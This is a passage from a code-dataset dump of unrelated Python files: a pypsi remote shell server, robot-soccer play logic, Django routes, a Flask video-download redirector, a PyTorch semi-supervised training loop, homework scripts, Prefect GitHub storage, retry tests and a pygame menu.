TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON\n# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\nimport threading\nimport sys\nimport json\nfrom io import StringIO\nimport select\nimport socket\nfrom pypsi.remote.session import RemotePypsiSession, ConnectionClosed\nfrom pypsi.remote import protocol as proto\nimport builtins\nimport readline\n\ndef server_print(*msg):\n #pass\n print(file=sys.stdout._get_root(), *msg)\n\n\nclass ThreadProxy(object):\n\n def __init__(self, orig):\n self._lock = threading.Lock()\n self._root = threading.get_ident()\n self._proxies = {}\n self._register_proxy(orig)\n\n def _register_proxy(self, obj):\n self._lock.acquire()\n self._proxies[threading.get_ident()] = obj\n self._lock.release()\n #if obj != sys.stdout:\n # server_print(\"register_proxy(\", threading.get_ident(), \") =\", obj)\n\n def _deregister_proxy(self):\n self._lock.acquire()\n if threading.get_ident() in self._proxies:\n del self._proxies[threading.get_ident()]\n self._lock.release()\n\n def __call__(self, *args, **kwargs):\n return self._get(threading.get_ident())(*args, **kwargs)\n\n def _get(self, id):\n return self._proxies[id]\n\n def _get_root(self):\n return self._proxies[self._root]\n\n def __getattr__(self, name):\n if threading.get_ident() in self._proxies:\n return getattr(self._proxies[threading.get_ident()], name)\n raise AttributeError(\"no proxy for current thread\")\n\n def __setattr__(self, name, value):\n if name in ('_lock', '_root', '_proxies'):\n super(ThreadProxy, self).__setattr__(name, value)\n elif threading.get_ident() in self._proxies:\n setattr(self.proxiesp[threading.get_ident()], name, value)\n else:\n raise AttributeError(\"no proxy for current thread\")\n\n\nclass SessionFileObjProxy(object):\n\n def __init__(self, session, isatty=True):\n self._isatty = isatty\n self._session = session\n self._buffer = StringIO()\n\n def __getattr__(self, name):\n return getattr(self._session.socket, name)\n\n def __setattr__(self, name, value):\n if name in ('_session', '_buffer', '_isatty'):\n super(SessionFileObjProxy, self).__setattr__(name, value)\n else:\n return setattr(self._session.socket, name, value)\n\n def write(self, s):\n #server_print(\"write():\", s)\n self._buffer.write(s)\n c = len(s)\n if '\\n' in s:\n self.flush()\n return c\n\n def flush(self):\n #server_print(\"flush:\", self._buffer.tell())\n if self._buffer.tell() != 0:\n t = self._buffer.getvalue()\n try:\n self._session.sendmsg(proto.ShellOutputResponse(t))\n except ConnectionClosed:\n raise EOFError\n self._buffer = StringIO()\n\n def isatty(self):\n return self._isatty\n\n def close(self):\n self.flush()\n\n\nclass ServerWorker(threading.Thread, RemotePypsiSession):\n\n def __init__(self, socket, shell_ctor):\n threading.Thread.__init__(self)\n RemotePypsiSession.__init__(self, socket)\n self.running = False\n self.shell_ctor = shell_ctor\n # self.fp = open('out.txt', 'w')\n\n def setup(self):\n self.buffer = StringIO()\n self.stdout = SessionFileObjProxy(self)\n self.queue = []\n self.running = True\n builtins.input._register_proxy(self.input)\n sys.stdout._register_proxy(self.stdout)\n sys.stderr._register_proxy(self.stdout)\n #sys.stdin._register_proxy(self.stdin)\n\n self.completer = None\n readline.set_completer._register_proxy(self.set_completer)\n readline.get_completer._register_proxy(lambda: self.completer)\n readline.get_begidx._register_proxy(lambda: self.begidx)\n readline.get_endidx._register_proxy(lambda: self.endidx)\n readline.get_line_buffer._register_proxy(lambda: self.line_buffer)\n\n def set_completer(self, c):\n self.completer = c\n\n def get_completions(self, line, prefix):\n completions = []\n if self.completer:\n self.line_buffer = line\n self.begidx = len(line) - len(prefix)\n self.endidx = len(line)\n i = 0\n while True:\n c = self.completer(line, i)\n i += 1\n if c is not None:\n completions.append(c)\n else:\n break\n return completions\n\n def run(self):\n self.setup()\n self.on_connect()\n try:\n self.shell = self.shell_ctor()\n self.shell.cmdloop()\n except ConnectionClosed:\n pass\n except:\n import traceback\n server_print(traceback.format_exc())\n finally:\n self.on_disconnect()\n self.cleanup()\n self.running = False\n\n return 0\n\n def flush_stdout(self):\n try:\n self.stdout.flush()\n except ConnectionClosed:\n raise EOFError\n\n def handle(self, msg):\n if isinstance(msg, proto.InputResponse):\n pass\n elif isinstance(msg, proto.CompletionRequest):\n pass\n else:\n pass\n\n def send_json(self, obj):\n # self.fp.write(str(obj))\n # self.fp.write('\\n')\n # self.fp.flush()\n return super().send_json(obj)\n\n def input(self, msg=''):\n self.flush_stdout()\n\n try:\n self.sendmsg(proto.InputRequest(msg))\n except ConnectionClosed:\n raise EOFError\n\n while True:\n msg = None\n try:\n msg = self.recvmsg()\n except proto.InvalidMessageError:\n return ''\n except ConnectionClosed:\n raise EOFError\n\n if isinstance(msg, proto.InputResponse):\n if msg.sig:\n if msg.sig == 'int':\n raise KeyboardInterrupt\n elif msg.sig == 'eof':\n raise EOFError\n return msg.input\n elif isinstance(msg, proto.CompletionRequest):\n try:\n self.sendmsg(\n proto.CompletionResponse(\n self.get_completions(msg.input, msg.prefix)\n )\n )\n except ConnectionClosed:\n raise EOFError\n else:\n return ''\n\n def stop(self):\n #server_print(\"stopping...\")\n self.running = False\n\n def cleanup(self):\n sys.stdout._deregister_proxy()\n sys.stderr._deregister_proxy()\n builtins.input._deregister_proxy()\n self.socket.close()\n # self.fp.close()\n #server_print(\"ServerWorker.cleanup()\")\n\n def on_connect(self):\n pass\n\n def on_disconnect(self):\n pass\n\n\nclass ShellServer(object):\n\n def __init__(self, port, shell_ctor):\n self.port = port\n self.shell_ctor = shell_ctor\n self.threads = []\n self.running = False\n self.clients = {}\n\n def run(self):\n self.running = True\n sys.stdout = ThreadProxy(sys.stdout)\n sys.stderr = sys.stdout\n readline.set_completer = ThreadProxy(readline.set_completer)\n readline.get_completer = ThreadProxy(readline.get_completer)\n readline.get_begidx = ThreadProxy(readline.get_begidx)\n readline.get_endidx = ThreadProxy(readline.get_endidx)\n readline.get_line_buffer = ThreadProxy(readline.get_line_buffer)\n builtins.input = ThreadProxy(builtins.input)\n\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)\n self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.socket.bind(('0.0.0.0', self.port))\n self.socket.listen(5)\n\n try:\n while self.running:\n if self.poll():\n (sock, addr) = self.socket.accept()\n print(\"Client connected:\", addr[0])\n self.spawn(sock, addr)\n else:\n self.purge()\n except KeyboardInterrupt:\n self.stop()\n except:\n import traceback\n print(traceback.format_exc())\n self.stop()\n\n self.cleanup()\n return 0\n\n def poll(self):\n fd = self.socket.fileno()\n (read, write, err) = select.select([fd], [], [fd], 0.5)\n if read or err:\n return True\n return False\n\n def spawn(self, sock, addr):\n t = ServerWorker(\n sock,\n self.shell_ctor\n )\n self.threads.append(t)\n t.start()\n self.clients[t.ident] = addr\n #server_print(\"spawn:\", t.ident, \"(\", threading.get_ident(), \")\")\n\n def cleanup(self):\n #print(\"ShellServer.cleanup()\")\n for t in self.threads:\n t.stop()\n\n for t in self.threads:\n t.join()\n\n self.threads = []\n\n def stop(self):\n #server_print(\"ShellServer.stop()\")\n self.running = False\n\n def purge(self):\n old = [t for t in self.threads if not t.is_alive()]\n for t in old:\n self.threads.remove(t)\n print(\"Client disconnected:\", self.clients[t.ident][0])\n del self.clients[t.ident]\n #server_print(\"purging:\", t.ident)\n del t\n\n","sub_path":"pypsi/remote/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":10968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"383140815","text":"import play\nimport ui.main\nimport tactics\n\n\n## @brief A standardized play that handles actions that an average play needs\n# Right now, this is only used to implement a standard way to run or not run\n# the play with defense, but any action that a normal play should do can be \n# placed here\nclass StandardPlay(play.Play):\n\n #Performs actions that all \"Standard Plays\" should do on initialization\n #Note: This method is called many times during the duration of a play,\n #Not just on selection\n def __init__(self, continuous):\n super().__init__(continuous)\n self.use_standard_defense()\n\n #If the \"Use Defense\" checkbox is checked and the play isn't already running\n #defense, then it adds the defense behavior. If the box isn't checked and the\n #play is running defense then it removes the behavior. Also note: it ignores\n #the requirement for goalie if the box is checked.\n def use_standard_defense(self):\n if ui.main.defenseEnabled() and not self.has_subbehavior_with_name(\n 'defense'):\n self.add_subbehavior(tactics.defense.Defense(),\n 'defense',\n required=False)\n elif not ui.main.defenseEnabled():\n if self.has_subbehavior_with_name('defense'):\n self.remove_subbehavior('defense')\n\n #Handles activity while the play is active. A play wishing to utilize this\n #method in additionto having an \"execute_running\" method of its own must call\n #it via super\n def execute_running(self):\n self.use_standard_defense()\n\n #Since the standard_play handles defense, it will always handle the goalie\n @classmethod\n def handles_goalie(cls):\n return True\n","sub_path":"soccer/gameplay/standard_play.py","file_name":"standard_play.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"352929433","text":"from django.conf.urls import url\nfrom .import views\n\nurlpatterns = [\n url(r'^$', views.index, name=\"index\"),\n url(r'^register$', views.register, name=\"register\"),\n url(r'^login$', views.login, name=\"login\"),\n url(r'^logout$', views.logout, name=\"logout\"),\n url(r'^success$', views.success, name=\"success\"),\n url(r'^books/add$', views.display_add, name=\"display_add\"),\n url(r'^books/add_books$', views.add, name=\"add\"),\n url(r'^books/add_review/(?P\\d+)$', views.add_review, name=\"add_review\"),\n url(r'^books/(?P\\d+)$', views.book, name=\"book\"),\n url(r'^books/delete/(?P\\d+)$', views.delete_review, name=\"delete_review\"),\n url(r'^users/(?P\\d+)$', views.view_user, name=\"view_user\"),\n]","sub_path":"django/full_stack_django/belt_reviewer/apps/belt_reviewer_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"408418819","text":"from flask import Flask , render_template , request , redirect\nimport youtube_dl\n\napp = Flask(__name__)\n@app.route('/')\n\ndef index():\n\n return render_template('index.html')\n\n@app.route('/' , methods=['POST'])\n@app.route('/download', methods=[\"POST\", \"GET\"])\ndef link():\n\turl = request.form[\"url\"]\n\twith youtube_dl.YoutubeDL() as ydl:\n\t\turl = ydl.extract_info(url, download=False)\n\t\ttry:\n\t\t\tdownload_link = url[\"entries\"][-1][\"formats\"][-1][\"url\"]\n\t\texcept:\n\t\t\tdownload_link = url[\"formats\"][-1][\"url\"]\n\t\treturn redirect(download_link+\"&dl=1\")\n\nif __name__ == '__main__':\n app.run(port= 8080)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"526456472","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 15 15:58:01 2019\n\n@author: Austin Hsu\n\"\"\"\n\nimport torch\nfrom torch import nn\nfrom torch.autograd import Variable\nimport torchvision.datasets as dsets\nimport torchvision.transforms as transforms\nimport torch.utils.data as data_utils\nimport numpy as np\nimport random\nimport math\nimport copy\nimport torch.nn.functional as F\n\nfrom train_modules.audio_augment import transform_method\nfrom train_modules.VAT import VATLoss\n\ndef train_resnet_4loss_VAT(input_t, target_Var, decoders, dec_opts, device,\n loss_funcs, INPUT_SIZE, OUTPUT_SIZE, BATCH_SIZE, k,\n unlabel_t, unlabel_lambda,\n ):\n \n # input_t shape: (1,3,522,data_length)\n # target_Var shape: (1,data_length,6)\n # unlabel_t shape: (1,3,522,unlabel_data_length)\n \n # encoder: Encoder\n # decoder: AttentionClassifier\n onDec = decoders[0]\n onDecOpt = dec_opts[0]\n onLossFunc = loss_funcs[0] #CrossEntropyLoss_for_MixMatch()\n smLossFunc = VATLoss()\n enLossFunc = EntropyLoss()\n\n input_time_step = input_t.size()[3]\n unlabel_time_step = unlabel_t.size()[3]\n\n window_size = 2*k+1\n \n totLoss = 0\n\n nn_softmax = nn.Softmax(dim=1)\n\n for step in range(k, input_time_step - k - BATCH_SIZE + 1, BATCH_SIZE): \n \n # --- Loss ---\n super_Loss = 0\n smsup_Loss = 0\n en_Loss = 0\n onLoss = 0 \n \n # --- Data Collection --- \n x_unmix_data = torch.stack([ input_t[0, :, :, step+i-k:step+i-k+window_size] for i in range(BATCH_SIZE)], dim=0)\n random_position = torch.randperm(unlabel_time_step-1-window_size)[:BATCH_SIZE]\n if step+BATCH_SIZE-k+window_size < unlabel_time_step:\n u_unmix_data = torch.stack([ unlabel_t[0, :, :, step+i-k:step+i-k+window_size] for i in range(BATCH_SIZE)], dim=0)\n else:\n u_unmix_data = torch.stack([ unlabel_t[0, :, :, random_position[i]:random_position[i]+window_size] for i in range(BATCH_SIZE)], dim=0)\n \n # ---Data Preprocessing ---\n x_mix_data, u_mix_data, x_mix_label = DataPreprocess(labeled_data=x_unmix_data,\n labeled_label=target_Var[:, step:step+BATCH_SIZE],\n unlabeled_data=u_unmix_data,\n device=device\n )\n \n # --- Pseudo Label ---\n # mix_label = torch.cat((x_mix_label, u_mix_label), dim=0)\n \n # --- Variable ---\n x_mix_data = Variable(x_mix_data)\n u_mix_data = Variable(u_mix_data)\n x_mix_label = Variable(x_mix_label) ###\n \n # --- Run Model ---\n onDecOut_mix = onDec(torch.cat((x_mix_data, u_mix_data),dim=0)) #onDec(x_mix_data) \n onDecOut6 = onDecOut_mix[:BATCH_SIZE]\n \n # === labeled ===\n onDecOut1 = nn_softmax(onDecOut6[:, :2])\n onDecOut2 = nn_softmax(onDecOut6[:, 2:4])\n onDecOut3 = nn_softmax(onDecOut6[:, 4:])\n \n temp_t = torch.max(onDecOut2[:, 1], onDecOut3[:, 1]).view(-1,1)\n onDecOut4 = torch.cat((onDecOut1, temp_t), dim=1)\n \n # --- Loss --- \n # === Supervised Loss ===\n super_Loss += onLossFunc(onDecOut1.view(-1, 2), x_mix_label[:, :2].contiguous().view(-1, 2))\n super_Loss += onLossFunc(onDecOut2.view(-1, 2), x_mix_label[:, 2:4].contiguous().view(-1, 2))\n super_Loss += onLossFunc(onDecOut3.view(-1, 2), x_mix_label[:, 4: ].contiguous().view(-1, 2))\n target_T = torch.max(x_mix_label[:, 3], x_mix_label[:, 5])\n super_Loss += onLossFunc(onDecOut4.view(-1, 3), torch.cat((x_mix_label[:, :2].contiguous().view(-1, 2), \n target_T.contiguous().view(-1, 1)), 1)) \n \n # === Entropy Minimization ===\n # --- labeled ---\n en_Loss += enLossFunc(onDecOut1.view(-1, 2))\n en_Loss += enLossFunc(onDecOut2.view(-1, 2))\n en_Loss += enLossFunc(onDecOut3.view(-1, 2))\n # --- unlabeled ---\n onDecOut1_u = nn_softmax(onDecOut_mix[BATCH_SIZE:, :2])\n onDecOut2_u = nn_softmax(onDecOut_mix[BATCH_SIZE:, 2:4])\n onDecOut3_u = nn_softmax(onDecOut_mix[BATCH_SIZE:, 4:])\n en_Loss += enLossFunc(onDecOut1_u.view(-1, 2))\n en_Loss += enLossFunc(onDecOut2_u.view(-1, 2))\n en_Loss += enLossFunc(onDecOut3_u.view(-1, 2))\n \n # === VAT Loss ===\n smsup_Loss += smLossFunc(onDec, u_mix_data) #torch.cat((x_mix_data, u_mix_data),dim=0)\n \n print('supervised_Loss: %.10f' % (super_Loss.item() / input_time_step), 'semi-supervised_Loss: %.10f' % (unlabel_lambda * smsup_Loss.item() / input_time_step)) #'entropy_Loss: %.10f' % (en_Loss.item() / input_time_step)\n onLoss = super_Loss + unlabel_lambda * smsup_Loss + en_Loss\n onDecOpt.zero_grad()\n onLoss.backward()\n onDecOpt.step()\n totLoss += onLoss.item()\n \n return totLoss / input_time_step \n\ndef DataPreprocess(labeled_data, labeled_label,\n unlabeled_data,\n device,\n transform_dict={'cutout' :False, #{'n_holes':1, 'height':50, 'width':5}, \n 'freq_mask' :{'freq_mask_param':100},\n 'time_mask' :False, #{'time_mask_param':5},\n 'pitchshift':{'shift_range':48}, \n 'addnoise' :False, #{'noise_type':'pink', 'noise_size':0.01}, \n },\n augment_time=1,\n ):\n \n # labeled_data shape: (batchsize, 9, 174, 19)\n # labeled_label shape: (batchsize, 6)\n # unlabeled_data shape: (batchsize, 9, 174, 19)\n \n # --- Setup Augmentation Methods ---\n transform = transform_method(transform_dict)\n \n # --- Normalization ---\n labeled_data = Normalize(labeled_data)\n unlabeled_data = Normalize(unlabeled_data)\n \n # --- Labeled Augmentation ---\n aug_x = transform(labeled_data)\n label_x = labeled_label[0]\n \n # --- Unlabeled Augmentation ---\n aug_u = transform(unlabeled_data)\n \n # --- Shuffle ---\n shuffle = torch.randperm(aug_x.size(0))\n shuffle2 = torch.randperm(aug_u.size(0))\n aug_x = aug_x[shuffle]\n aug_u = aug_u[shuffle2]\n label_x = label_x[shuffle]\n \n # --- CUDA ---\n aug_x = aug_x.to(device)\n aug_u = aug_u.to(device)\n labeled_label = labeled_label.to(device, non_blocking=True)\n \n return aug_x, aug_u, label_x\n\ndef Normalize(data):\n # Batchwise normalization (test)\n return (data-torch.mean(data))/torch.std(data)\n \nclass EntropyLoss(nn.Module):\n def __init__(self, entmin_weight=1.0):\n super(EntropyLoss, self).__init__()\n self.entmin_weight = entmin_weight\n def forward(self, softmax_x):\n return -self.entmin_weight * torch.mean(softmax_x * torch.log(softmax_x)) \n","sub_path":"src/train_modules/train_sdt6_resnet_VAT.py","file_name":"train_sdt6_resnet_VAT.py","file_ext":"py","file_size_in_byte":7118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"623863245","text":"def move_disk(disk_num, start_peg, end_peg):\n print(\"%d번 원판을 %d번 기둥에서 %d번 기둥으로 이동\" % (disk_num, start_peg, end_peg))\n\ndef hanoi(num_discs, start_peg = 1, end_peg = 3):\n\n if num_discs == 0:\n return\n else:\n other_peg = 6 - start_peg - end_peg\n hanoi(num_discs - 1, start_peg, other_peg)\n # hanoi(2, 1, 2) 호출, 재귀로 한번 더 hanoi(1,1,2) 호출\n move_disk(num_discs, start_peg, end_peg)\n # move_disk(3, 1, 3) 호출, print 3번 원판을 1번 기둥에서 3번 기둥으로 이동\n hanoi(num_discs - 1, other_peg, end_peg)\n # hanoi(2, 2, 3) 호출, 재귀로 hanoi(1, 2, 3) 호출\n\n\n# 테스트 코드 (포함하여 제출해주세요)\nhanoi(3, 1, 3)\n\n","sub_path":"12-11 하노이.py","file_name":"12-11 하노이.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"14568662","text":"# By submitting this assignment, all team members agree to the following:\r\n# “Aggies do not lie, cheat, or steal, or tolerate those who do”\r\n# “I have not given or received any unauthorized aid on this assignment”\r\n# \r\n# Names: \tBenjamin Mejia Diaz (628004466)\r\n# \t \t\tNeil Magan-Patel\r\n# \t \t\tRong Xu (928009312)\r\n#\t\t\tDaniel Pinilla Silva\r\n# Section:\t\t554\r\n# Assignment:\tLab 8a\r\n# Date: 10/26/19\r\n\r\n############## Compiling Data Points ##############\r\ndata = []\r\nprint('This program asks for different points, and approximates the value of any x value based on the closests points. It will only work on functions.\\n\\n')\r\nprint('Enter \"stop\" as your x-value to stop input of values.\\n')\r\nwhile True:\r\n coord = []\r\n x = input(\"Enter x value: \")\r\n if x == \"stop\":\r\n break\r\n y = input(\"Enter y value: \")\r\n coord.append(int(x))\r\n coord.append(int(y))\r\n data.append(coord)\r\n \r\n###print(data)\r\n \r\n############## Sorting the data ##############\r\ndef bubble_sort(nums):\r\n\r\n for i in range(len(nums) - 1):\r\n for j in range(len(nums) - i - 1): \r\n if nums[j] > nums[j + 1]:\r\n nums[j], nums[j + 1] = nums[j + 1], nums[j]\r\n\r\n return nums\r\ndata = bubble_sort(data)\r\n\r\n\r\n############## Finding the y-value ##############\r\nwhile True:\r\n unknown = input('Enter the x-value that is to be approximated:')\r\n if unknown != 'stop':\r\n unknown = int(unknown)\r\n ## This is for any point outside the given range of values = extrapolation\r\n if (unknown < data[0][0]) or (unknown > data[len(data)-1][0]):\r\n \r\n m = (data[len(data)-1][1]-data[0][1])/(data[len(data)-1][0]-data[0][0])\r\n b = data[0][1]-(m*data[0][0])\r\n print(\"{0:.2f}\".format((m*unknown)+b))\r\n else:\r\n ## This is for any point inside the given range of values = intrapolation\r\n left = 0\r\n right = 0\r\n distance_r = float('inf')\r\n distance_l = float('inf')\r\n for i in range(len(data)):\r\n \r\n ##The ifs check for the left and right and the distance to the number all based on the x position.\r\n if unknown == data[i][0]:\r\n ##print(data[i][1])\r\n break\r\n if unknown > data[i][0] and abs(unknown-data[i][0]) < distance_r:\r\n left = i\r\n distance_r = abs(unknown-data[i][0])\r\n if unknown < data[i][0] and abs(unknown-data[i][0]) < distance_l:\r\n right = i\r\n distance_l = abs(unknown-data[i][0])\r\n #print(left,right)\r\n m = (data[right][1]-data[left][1])/(data[right][0]-data[left][0])\r\n b = data[left][1]-(m*data[left][0])\r\n print(\"{0:.3f}\".format((m*unknown)+b))\r\n else:\r\n break","sub_path":"Lab09/Lab09a/Lab a/final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"562370769","text":"from typing import TYPE_CHECKING, Any, Dict, List\n\n\nfrom prefect.environments.storage import Storage\nfrom prefect.utilities.storage import extract_flow_from_file\n\nif TYPE_CHECKING:\n from prefect.core.flow import Flow\n\n\nclass GitHub(Storage):\n \"\"\"\n GitHub storage class. This class represents the Storage interface for Flows stored\n in `.py` files in a GitHub repository.\n\n This class represents a mapping of flow name to file paths contained in the git repo,\n meaning that all flow files should be pushed independently. A typical workflow using\n this storage type might look like the following:\n\n - Compose flow `.py` file where flow has GitHub storage:\n\n ```python\n flow = Flow(\"my-flow\")\n flow.storage = GitHub(repo=\"my/repo\", path=\"/flows/flow.py\")\n ```\n\n - Push this `flow.py` file to the `my/repo` repository under `/flows/flow.py`.\n\n - Call `prefect register -f flow.py` to register this flow with GitHub storage.\n\n Args:\n - repo (str): the name of a GitHub repository to store this Flow\n - path (str, optional): a path pointing to a flow file in the repo\n - ref (str, optional): a commit SHA-1 value or branch name. Defaults to 'master' if not specified\n - **kwargs (Any, optional): any additional `Storage` initialization options\n \"\"\"\n\n def __init__(\n self, repo: str, path: str = None, ref: str = None, **kwargs: Any\n ) -> None:\n self.flows = dict() # type: Dict[str, str]\n self._flows = dict() # type: Dict[str, \"Flow\"]\n self.repo = repo\n self.path = path\n self.ref = ref\n\n super().__init__(**kwargs)\n\n @property\n def default_labels(self) -> List[str]:\n return [\"github-flow-storage\"]\n\n def get_flow(self, flow_location: str = None, ref: str = None) -> \"Flow\":\n \"\"\"\n Given a flow_location within this Storage object, returns the underlying Flow (if possible).\n If the Flow is not found an error will be logged and `None` will be returned.\n\n Args:\n - flow_location (str): the location of a flow within this Storage; in this case,\n a file path on a repository where a Flow file has been committed. Will use `path` if not\n provided.\n - ref (str, optional): a commit SHA-1 value or branch name. Defaults to 'master' if not\n specified\n\n Returns:\n - Flow: the requested Flow\n\n Raises:\n - ValueError: if the flow is not contained in this storage\n - UnknownObjectException: if the flow file is unable to be retrieved\n \"\"\"\n if flow_location:\n if flow_location not in self.flows.values():\n raise ValueError(\"Flow is not contained in this Storage\")\n elif self.path:\n flow_location = self.path\n else:\n raise ValueError(\"No flow location provided\")\n\n from github import UnknownObjectException\n\n repo = self._github_client.get_repo(self.repo)\n\n try:\n contents = repo.get_contents(flow_location, ref=ref or self.ref)\n decoded_contents = contents.decoded_content\n except UnknownObjectException as exc:\n self.logger.error(\n \"Error retrieving file contents from {} on repo {}. Ensure the file exists.\".format(\n flow_location, self.repo\n )\n )\n raise exc\n\n return extract_flow_from_file(file_contents=decoded_contents)\n\n def add_flow(self, flow: \"Flow\") -> str:\n \"\"\"\n Method for storing a new flow as bytes in the local filesytem.\n\n Args:\n - flow (Flow): a Prefect Flow to add\n\n Returns:\n - str: the location of the added flow in the repo\n\n Raises:\n - ValueError: if a flow with the same name is already contained in this storage\n \"\"\"\n if flow.name in self:\n raise ValueError(\n 'Name conflict: Flow with the name \"{}\" is already present in this storage.'.format(\n flow.name\n )\n )\n\n self.flows[flow.name] = self.path # type: ignore\n self._flows[flow.name] = flow\n return self.path # type: ignore\n\n def build(self) -> \"Storage\":\n \"\"\"\n Build the GitHub storage object and run basic healthchecks. Due to this object\n supporting file based storage no files are committed to the repository during\n this step. Instead, all files should be committed independently.\n\n Returns:\n - Storage: a GitHub object that contains information about how and where\n each flow is stored\n \"\"\"\n self.run_basic_healthchecks()\n\n return self\n\n def __contains__(self, obj: Any) -> bool:\n \"\"\"\n Method for determining whether an object is contained within this storage.\n \"\"\"\n if not isinstance(obj, str):\n return False\n return obj in self.flows\n\n @property\n def _github_client(self): # type: ignore\n from prefect.utilities.git import get_github_client\n\n return get_github_client()\n","sub_path":"src/prefect/environments/storage/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":5179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"491053164","text":"import pytest\n\nfrom async_vk_api import retry\n\n\nasync def test_single_exception():\n exc = RuntimeError\n attempts = 4\n n = 0\n\n @retry.on(exc, attempts=attempts)\n async def func():\n nonlocal n\n n += 1\n raise exc\n\n with pytest.raises(exc):\n await func()\n\n assert n == attempts\n\n\nasync def test_multiple_exceptions():\n exc1, exc2 = ValueError, TypeError\n attempts = 2\n n = 0\n\n @retry.on((exc1, exc2), attempts=attempts)\n async def func():\n nonlocal n\n n += 1\n\n if n == 1:\n raise exc1\n elif n == 2:\n raise exc2\n else:\n assert not 'Reachable'\n\n with pytest.raises(exc2):\n await func()\n\n assert attempts == n\n","sub_path":"tests/test_retry.py","file_name":"test_retry.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"2927789","text":"# BitCity Studios:\n# Cameron O'Leary \n# Steve Griffin \n# Jeremy Dolinko \n# Jonathan Rivera \n# Michael Shavit \nfrom pygame import key\nfrom pygame import display\nfrom pygame import Rect\nimport pygame.draw\n\nfrom pygame.locals import *\nimport os\nfrom images import movingBackground as MB\nfrom sounds import music as M\nimport state\nimport glob\n\nMAIN_CHOICES = [\n glob.gameString,\n glob.levelString,\n glob.settingsString,\n glob.highScoreString,\n glob.exitString]\n\n# LEVEL_CHOICES = glob.levelChoices[1:] # Since the first element is None\n\nSETTINGS_CHOICES = [glob.resolutionString,\n glob.volumeString,\n glob.difficultyString,\n glob.keySettings, glob.menuString]\n\nRESOLUTION_CHOICES = [glob.tinyRes, glob.smallRes, glob.mediumRes,\n glob.largeRes]\n#@StaticMethod\n\n\ndef getLevelChoices():\n \"\"\"Gets the possible level selection\"\"\"\n # Start at 1 since the first element is None\n if glob.DEBUG:\n return glob.levelChoices[1:]\n return glob.levelChoices[1: glob.Levels.lastLevel + 1]\n\n\nclass Menu(state.State):\n\n \"\"\"\n A state defining a generic menu with a moving background picture.\n Menu is genericized in that you can give it whatever state strings\n you want and it will allow you to transition between them. These\n state strings are defined in globs.py. The SETTINGS_CHOICES is just\n a list of these state strings for the settings menu. It's in menu.py\n as a static global list. The state strings also double as the text\n displayed in a menu.\n \"\"\"\n\n def __init__(self, s, title, choicesList):\n \"\"\"\n Constructor.\n \"\"\"\n super(Menu, self).__init__(s)\n self.name = title\n # Set the background\n self.background = MB.MovingBackground(s)\n self.choices = choicesList\n self.pos = 0\n M.menuMusic()\n\n def draw(self):\n \"\"\"Perform all graphical tasks for this frame.\"\"\"\n self.background.draw()\n for i in range(0, len(self.choices)):\n self.drawItem(i)\n\n self.drawTitle()\n display.flip()\n\n def update(self, dt):\n \"\"\"Perform all calculations for the amount of time that has passed.\"\"\"\n super(Menu, self).update(dt)\n self.background.update(dt)\n\n def drawItem(self, i):\n \"\"\"Draws the text of a menu choice.\"\"\"\n col = glob.FONT_COLOR\n backCol = glob.SELECTED_FONT_COLOR\n surf = glob.FONT.render(self.choices[i], True, col)\n width, height = surf.get_size()\n left = (self.width - width) / 2\n top = self.height / 3 + height * i\n if i == self.pos:\n backCol, col = col, backCol\n r = Rect(left, top, width, height)\n pygame.draw.rect(self.s, backCol, r)\n surf = glob.FONT.render(self.choices[i], True, col)\n self.s.blit(surf, (left, top))\n\n def drawTitle(self):\n \"\"\"Draws the menu title.\"\"\"\n col = glob.FONT_COLOR\n backCol = glob.SELECTED_FONT_COLOR\n surf = glob.FONT.render(self.name, True, col)\n width, height = surf.get_size()\n left = (self.width - width) / 2\n top = self.height / 10\n self.s.blit(surf, (left, top))\n\n def processKeys(self, keys, dt):\n result = super(Menu, self).processKeys(keys, dt)\n if result != state.standardString:\n return result\n elif keys[glob.mappedKeys[\"select\"]]:\n\n if self.getCurrentChoice() == glob.gameString:\n M.stopMusic()\n if glob.isPaused:\n return glob.gameString\n return glob.cutString\n\n return self.getCurrentChoice()\n elif keys[glob.mappedKeys[\"up\"]]:\n self.timeAlive = 0\n self.incMenu(-1)\n elif keys[glob.mappedKeys[\"down\"]]:\n self.timeAlive = 0\n self.incMenu(1)\n return None\n\n def incMenu(self, amount):\n \"\"\"Steps by the passed amount in the menu.\"\"\"\n self.pos += amount\n if self.pos < 0:\n self.pos = len(self.choices) - 1\n elif self.pos > len(self.choices) - 1:\n self.pos = 0\n\n def getCurrentChoice(self):\n \"\"\"Returns the current menu choice string.\"\"\"\n return self.choices[self.pos]\n\n\nif __name__ == \"__main__\":\n 